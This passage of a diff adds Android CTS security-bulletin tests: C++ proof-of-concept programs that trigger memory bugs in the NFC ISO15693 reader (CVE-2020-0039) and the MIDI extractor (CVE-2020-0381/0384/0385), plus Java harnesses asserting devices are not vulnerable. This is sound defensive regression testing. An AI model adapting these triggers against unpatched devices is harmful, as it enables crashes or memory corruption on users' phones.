+    return EXIT_FAILURE;
+  }
+
+  p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+  if (!(p_data->data.p_data)) {
+    free(p_data);
+    free(nfc_cb.quick_timer_queue.p_first);
+    return EXIT_FAILURE;
+  }
+  enable_selective_overload = ENABLE_NONE;
+
+  (p_data->data.p_data)->len = 10;
+  p_data->data.p_data->offset = 0;
+  p_data->status = NFC_STATUS_OK;
+
+  p_cb->p_cback(0, event, p_data);
+
+  free(p_data);
+  free(nfc_cb.quick_timer_queue.p_first);
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp
new file mode 100644
index 00000000000..16dac281b93
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2020-0039",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ],
+    compile_multilib: "64",
+    include_dirs: [
+        "system/nfc/src/nfc/include/",
+        "system/nfc/src/include/",
+        "system/nfc/src/gki/common/",
+        "system/nfc/src/gki/ulinux/",
+        "system/nfc/src/nfa/include/",
+    ],
+    shared_libs: [
+        "libnfc-nci",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp
new file mode 100644
index 00000000000..6ebc3f331ae
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp
@@ -0,0 +1,148 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+#include <dlfcn.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+// borrowed from rw_i93.cc
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t *p_uid);
+
+bool kIsInitialized = false;
+
+// borrowed from rw_i93.cc
+enum {
+  RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated            */
+  RW_I93_STATE_IDLE,          /* waiting for upper layer API          */
+  RW_I93_STATE_BUSY,          /* waiting for response from tag        */
+
+  RW_I93_STATE_DETECT_NDEF,   /* performing NDEF detection precedure  */
+  RW_I93_STATE_READ_NDEF,     /* performing read NDEF procedure       */
+  RW_I93_STATE_UPDATE_NDEF,   /* performing update NDEF procedure     */
+  RW_I93_STATE_FORMAT,        /* performing format procedure          */
+  RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure   */
+
+  RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag             */
+};
+
+// borrowed from rw_i93.cc
+enum {
+  RW_I93_SUBSTATE_WAIT_UID,          /* waiting for response of inventory    */
+  RW_I93_SUBSTATE_WAIT_SYS_INFO,     /* waiting for response of get sys info */
+  RW_I93_SUBSTATE_WAIT_CC,           /* waiting for reading CC               */
+  RW_I93_SUBSTATE_SEARCH_NDEF_TLV,   /* searching NDEF TLV                   */
+  RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked      */
+
+  RW_I93_SUBSTATE_RESET_LEN,  /* set length to 0 to update NDEF TLV   */
+  RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV      */
+  RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV             */
+
+  RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+  RW_I93_SUBSTATE_CHECK_READ_ONLY,   /* check if any block is locked         */
+  RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+                                      */
+
+  RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only             */
+  RW_I93_SUBSTATE_LOCK_NDEF_TLV,  /* lock blocks of NDEF TLV              */
+  RW_I93_SUBSTATE_WAIT_LOCK_CC    /* lock block of CC                     */
+};
+
+static void *(*real_GKI_getbuf)(uint16_t size) = nullptr;
+static void (*real_GKI_freebuf)(void *ptr) = nullptr;
+
+void init(void) {
+  real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft");
+  if (!real_GKI_getbuf) {
+    return;
+  }
+
+  real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+  if (!real_GKI_freebuf) {
+    return;
+  }
+
+  kIsInitialized = true;
+}
+
+void *GKI_getbuf(uint16_t size) {
+  if (!kIsInitialized) {
+    init();
+  }
+  return malloc(size);
+}
+
+void GKI_freebuf(void *ptr) {
+  if (!kIsInitialized) {
+    init();
+  }
+  free(ptr);
+}
+
+int main() {
+  tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
+
+  GKI_init();
+  rw_init();
+
+  uint8_t p_uid = 1;
+  if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+    return EXIT_FAILURE;
+  }
+
+  tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+  nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16);
+  tNFC_CONN_EVT event = NFC_DATA_CEVT;
+  p_i93->state = RW_I93_STATE_UPDATE_NDEF;
+  p_i93->sub_state = RW_I93_SUBSTATE_UPDATE_LEN;
+  p_i93->block_size = 30;
+  p_i93->rw_length = 1;
+
+  enable_selective_overload = ENABLE_ALL;
+  tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
+  if (!p_data) {
+    free(nfc_cb.quick_timer_queue.p_first);
+    return EXIT_FAILURE;
+  }
+
+  p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR));
+  if (!(p_data->data.p_data)) {
+    free(p_data);
+    free(nfc_cb.quick_timer_queue.p_first);
+    return EXIT_FAILURE;
+  }
+  enable_selective_overload = ENABLE_NONE;
+
+  (p_data->data.p_data)->len = 10;
+  p_data->data.p_data->offset = 0;
+  p_data->status = NFC_STATUS_OK;
+
+  p_cb->p_cback(0, event, p_data);
+
+  free(p_data);
+  free(nfc_cb.quick_timer_queue.p_first);
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp
new file mode 100644
index 00000000000..9f254e33199
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2020-0381",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    include_dirs: [
+        "frameworks/av/media/libmedia/include/android",
+        "frameworks/av/media/libmedia/include",
+        "frameworks/av/media/libstagefright/foundation/include",
+        "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+        "frameworks/av/media/libstagefright/include",
+        "frameworks/av/media/libstagefright/include/media/stagefright",
+    ],
+    shared_libs: [
+        "libutils",
+        "libmediandk",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp
new file mode 100644
index 00000000000..43da25d3c3e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+  int mFdData;
+  int mFdInfo;
+  XMFDataSource(int fdData, int fdInfo) {
+    mFdData = fdData;
+    mFdInfo = fdInfo;
+  }
+
+  ~XMFDataSource() = default;
+
+  virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+                         size_t size) {
+    uint32_t infoOffset, infoSize;
+    read(mFdInfo, &infoSize, sizeof(int32_t));
+    read(mFdInfo, &infoOffset, sizeof(int32_t));
+    lseek(mFdData, infoOffset, SEEK_SET);
+    read(mFdData, data, infoSize);
+    return size;
+  }
+
+  virtual status_t getSize(off64_t *size) {
+    *size = 0x10000;
+    return 0;
+  }
+  virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+  if (fdData >= 0) {
+    ::close(fdData);
+  }
+  if (fdInfo >= 0) {
+    ::close(fdInfo);
+  }
+  if (libHandle) {
+    dlclose(libHandle);
+  }
+}
+
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    return EXIT_FAILURE;
+  }
+  enable_selective_overload = ENABLE_ALL;
+  void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+  if (!libHandle) {
+    libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+    if (!libHandle) {
+      return EXIT_FAILURE;
+    }
+  }
+
+  GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+  if (!getDef) {
+    dlclose(libHandle);
+    return EXIT_FAILURE;
+  }
+
+  int fdData = open(argv[1], O_RDONLY);
+  if (fdData < 0) {
+    dlclose(libHandle);
+    return EXIT_FAILURE;
+  }
+  int fdInfo = open(argv[2], O_RDONLY);
+  if (fdInfo < 0) {
+    close_resources(fdData, fdInfo, libHandle);
+    return EXIT_FAILURE;
+  }
+
+  sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+  if (!dataSource) {
+    close_resources(fdData, fdInfo, libHandle);
+    return EXIT_FAILURE;
+  }
+
+  void *meta = nullptr;
+  FreeMetaFunc freeMeta = nullptr;
+
+  float confidence = 0.0f;
+  if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+    getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+  } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+    getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+  }
+
+  close_resources(fdData, fdInfo, libHandle);
+  enable_selective_overload = ENABLE_NONE;
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp
new file mode 100644
index 00000000000..5d003453f3e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2020-0384",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    include_dirs: [
+        "frameworks/av/media/libmedia/include/android",
+        "frameworks/av/media/libmedia/include",
+        "frameworks/av/media/libstagefright/foundation/include",
+        "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+        "frameworks/av/media/libstagefright/include",
+        "frameworks/av/media/libstagefright/include/media/stagefright",
+    ],
+    shared_libs: [
+        "libutils",
+        "libmediandk",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
new file mode 100644
index 00000000000..43da25d3c3e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+  int mFdData;
+  int mFdInfo;
+  XMFDataSource(int fdData, int fdInfo) {
+    mFdData = fdData;
+    mFdInfo = fdInfo;
+  }
+
+  ~XMFDataSource() = default;
+
+  virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+                         size_t size) {
+    uint32_t infoOffset, infoSize;
+    read(mFdInfo, &infoSize, sizeof(int32_t));
+    read(mFdInfo, &infoOffset, sizeof(int32_t));
+    lseek(mFdData, infoOffset, SEEK_SET);
+    read(mFdData, data, infoSize);
+    return size;
+  }
+
+  virtual status_t getSize(off64_t *size) {
+    *size = 0x10000;
+    return 0;
+  }
+  virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+  if (fdData >= 0) {
+    ::close(fdData);
+  }
+  if (fdInfo >= 0) {
+    ::close(fdInfo);
+  }
+  if (libHandle) {
+    dlclose(libHandle);
+  }
+}
+
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    return EXIT_FAILURE;
+  }
+  enable_selective_overload = ENABLE_ALL;
+  void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+  if (!libHandle) {
+    libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+    if (!libHandle) {
+      return EXIT_FAILURE;
+    }
+  }
+
+  GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+  if (!getDef) {
+    dlclose(libHandle);
+    return EXIT_FAILURE;
+  }
+
+  int fdData = open(argv[1], O_RDONLY);
+  if (fdData < 0) {
+    dlclose(libHandle);
+    return EXIT_FAILURE;
+  }
+  int fdInfo = open(argv[2], O_RDONLY);
+  if (fdInfo < 0) {
+    close_resources(fdData, fdInfo, libHandle);
+    return EXIT_FAILURE;
+  }
+
+  sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+  if (!dataSource) {
+    close_resources(fdData, fdInfo, libHandle);
+    return EXIT_FAILURE;
+  }
+
+  void *meta = nullptr;
+  FreeMetaFunc freeMeta = nullptr;
+
+  float confidence = 0.0f;
+  if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+    getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+  } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+    getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+  }
+
+  close_resources(fdData, fdInfo, libHandle);
+  enable_selective_overload = ENABLE_NONE;
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp
new file mode 100644
index 00000000000..5a32f57234e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+    name: "CVE-2020-0385",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_memutils",
+    ],
+    include_dirs: [
+        "frameworks/av/media/libmedia/include/android",
+        "frameworks/av/media/libmedia/include",
+        "frameworks/av/media/libstagefright/foundation/include",
+        "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation",
+        "frameworks/av/media/libstagefright/include",
+        "frameworks/av/media/libstagefright/include/media/stagefright",
+    ],
+    shared_libs: [
+        "libutils",
+        "libmediandk",
+    ],
+    cflags: [
+        "-DCHECK_OVERFLOW",
+        "-DENABLE_SELECTIVE_OVERLOADING",
+    ]
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp
new file mode 100644
index 00000000000..43da25d3c3e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp
@@ -0,0 +1,129 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <IMediaExtractor.h>
+#include <dlfcn.h>
+#include <signal.h>
+#include <stdlib.h>
+#include <fcntl.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#if _32_BIT
+#define LIBNAME "/system/lib/extractors/libmidiextractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib/extractors/libmidiextractor.so"
+#elif _64_BIT
+#define LIBNAME "/system/lib64/extractors/libmidiextractor.so"
+#define LIBNAME_APEX                                                           \
+  "/apex/com.android.media/lib64/extractors/libmidiextractor.so"
+#endif
+
+char enable_selective_overload = ENABLE_NONE;
+
+using namespace android;
+
+class XMFDataSource : public DataSource {
+public:
+  int mFdData;
+  int mFdInfo;
+  XMFDataSource(int fdData, int fdInfo) {
+    mFdData = fdData;
+    mFdInfo = fdInfo;
+  }
+
+  ~XMFDataSource() = default;
+
+  virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data,
+                         size_t size) {
+    uint32_t infoOffset, infoSize;
+    read(mFdInfo, &infoSize, sizeof(int32_t));
+    read(mFdInfo, &infoOffset, sizeof(int32_t));
+    lseek(mFdData, infoOffset, SEEK_SET);
+    read(mFdData, data, infoSize);
+    return size;
+  }
+
+  virtual status_t getSize(off64_t *size) {
+    *size = 0x10000;
+    return 0;
+  }
+  virtual status_t initCheck() const { return 0; }
+};
+
+void close_resources(int fdData, int fdInfo, void *libHandle) {
+  if (fdData >= 0) {
+    ::close(fdData);
+  }
+  if (fdInfo >= 0) {
+    ::close(fdInfo);
+  }
+  if (libHandle) {
+    dlclose(libHandle);
+  }
+}
+
+int main(int argc, char **argv) {
+  if (argc < 3) {
+    return EXIT_FAILURE;
+  }
+  enable_selective_overload = ENABLE_ALL;
+  void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL);
+  if (!libHandle) {
+    libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL);
+    if (!libHandle) {
+      return EXIT_FAILURE;
+    }
+  }
+
+  GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF");
+  if (!getDef) {
+    dlclose(libHandle);
+    return EXIT_FAILURE;
+  }
+
+  int fdData = open(argv[1], O_RDONLY);
+  if (fdData < 0) {
+    dlclose(libHandle);
+    return EXIT_FAILURE;
+  }
+  int fdInfo = open(argv[2], O_RDONLY);
+  if (fdInfo < 0) {
+    close_resources(fdData, fdInfo, libHandle);
+    return EXIT_FAILURE;
+  }
+
+  sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo);
+  if (!dataSource) {
+    close_resources(fdData, fdInfo, libHandle);
+    return EXIT_FAILURE;
+  }
+
+  void *meta = nullptr;
+  FreeMetaFunc freeMeta = nullptr;
+
+  float confidence = 0.0f;
+  if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) {
+    getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+  } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) {
+    getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta);
+  }
+
+  close_resources(fdData, fdInfo, libHandle);
+  enable_selective_overload = ENABLE_NONE;
+  return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
new file mode 100644
index 00000000000..4dd4b39acd1
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_0684 extends SecurityTestCase {
+
+    /**
+     * b/35421151
+     * Vulnerability Behaviour: SIGSEGV in media.codec
+     */
+    @SecurityTest(minPatchLevel = "2017-07")
+    @Test
+    public void testPocCVE_2017_0684() throws Exception {
+        pocPusher.only32();
+        String errPattern[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0684", null, getDevice(),
+        errPattern);
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
new file mode 100644
index 00000000000..5a17589a504
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_0726 extends SecurityTestCase {
+
+    /**
+     * b/36389123
+     * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+     */
+    @SecurityTest(minPatchLevel = "2017-08")
+    @Test
+    public void testPocCVE_2017_0726() throws Exception {
+        pocPusher.only64();
+        String inputFiles[] = {"cve_2017_0726.mp4"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0726",
+                AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
new file mode 100644
index 00000000000..38c8be06e69
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2115 extends SecurityTestCase {
+
+    /**
+     * b/129768470
+     * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+     */
+    @SecurityTest(minPatchLevel = "2019-09")
+    @Test
+    public void testPocCVE_2019_2115() throws Exception {
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2115", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
index 81100e60a4b..db98e2858b0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
@@ -16,31 +16,24 @@
 
 package android.security.cts;
 
+import com.android.tradefed.device.ITestDevice;
+
